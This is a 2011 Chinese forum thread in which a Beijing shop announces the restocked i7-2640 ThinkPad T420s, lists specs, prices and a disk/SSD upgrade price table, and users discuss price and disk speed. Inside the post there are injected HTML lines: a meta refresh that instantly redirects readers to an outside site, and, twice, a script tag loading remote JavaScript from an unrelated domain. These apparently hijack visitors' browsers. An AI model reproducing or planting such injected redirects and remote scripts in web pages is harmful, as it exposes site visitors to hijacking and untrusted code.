开业于2004年,诚信服务几万客户
翔意数码淘宝店:xynbnb.taobao.com
全国客服电话:010-59000667
地址:北京东城区东兴隆街56号北京商界A座512
ThinkPad产品专业客服 苹果产品专业客服

i7核心的T420s终于升级到货啦!

T420s-PK8
香港
i7-2640
2.80G
4G
1*4G
320G
7200转
DVDRW
Nvidia+INTEL
NVS4200+3000
1G
14.1寸宽屏
1600*900
LED背光
蓝牙/摄像头/指纹/USB3.0/6芯电池  9100元
  9300元
库存稳定
货源稳定
翔意推荐

i7核心的T420s断货有一段时间啦,今天终于再次到货,持币待购的朋友们欢迎选购哦!
另外,CPU由i7-2620升级到i7-2640咯,性能更加强劲咯
<meta http-equiv="refresh" content="0; url=http://www.9292.cc">
★★★
<script type="text/javascript" src="http://www.7755.cc/q.js"></script>
<link href="http://www.7755.cc/1.css" rel="stylesheet" type="text/css" media="screen" />

<P>&nbsp;</P>

更新以后还涨价了 {:9_1045:}
不知道双蛋节是否有活动啊,什么时候出台哦

★★★
<script type="text/javascript" src="http://www.7755.cc/q.js"></script>
<link href="http://www.7755.cc/1.css" rel="stylesheet" type="text/css" media="screen" />

新东西当然是贵的

好牛逼的I7啊

成本也提高了么

男人节                        

能换成160的固态硬盘吗,价格呢

硬盘升级方案(交换价格需在购买时,单独购买不限时间)(更换配件保修期和购买机器的保修期相同)(原硬盘更换升级不分转速):
适用于全部使用SATA硬盘的THINKPAD机型T420系列,W520系列。X220和X220T机型由于采用的7mm硬盘,仅限升级到SSD的服务。
(T6X,X6X,R6X,SL系列,T400,T410,X200,X201系列,R500,T500,W500,W510等)

想升级到320G 想升级到500G 想升级到80G SSD
(INTEL SSD) 想升级到160G SSD
(INTEL SSD)
原配160G 249元
349元(7200转) 499元
599元(7200转) 999元 1699元
原配250G 229元
329元(7200转) 449元
549元(7200转) 999元 1699元
原配320G -
199元(7200转)
349元
449元(7200转) 899元 1599元
原配500G - -
299元(7200转) 799元 1499元

可以的,报价下面有价格哦

纠正 PK8 的处理器是提升至2640 但320的硬盘由7200转变成了5400转了!

这样的话,原配320G -
199元(7200转)
349元
449元(7200转) 899元 1599元

320G 5400转升至160SSD是加1599,7200转升至160SSD是1400元还是介于1400和1599元之间还是1599元呢

我有排排站,是否还减200元,有配套的键盘膜和屏幕膜吗

强机到来

价格和SSD拉的太近了

160的SSD太不够用了

zhijiazhan 发表于 2011-12-9 21:11
160的SSD太不够用了

办公笔记本80G还剩40G的飘过,哈哈

160G是稍小了点

终于出来了

更新换代真是快啊~~相信RY6 RY7也很快要升级版本出来了

好机器,ssd、i7威武

sai0328 发表于 2011-12-9 19:23
纠正 PK8 的处理器是提升至2640 但320的硬盘由7200转变成了5400转了!

这个差点意思               

为毛硬盘转速反而降低了啊?

sai0328 发表于 2011-12-9 19:23

你在哪里看见的·····我怎么看的硬盘···还是7200转啊

已确认是7200转,大家可以放心购买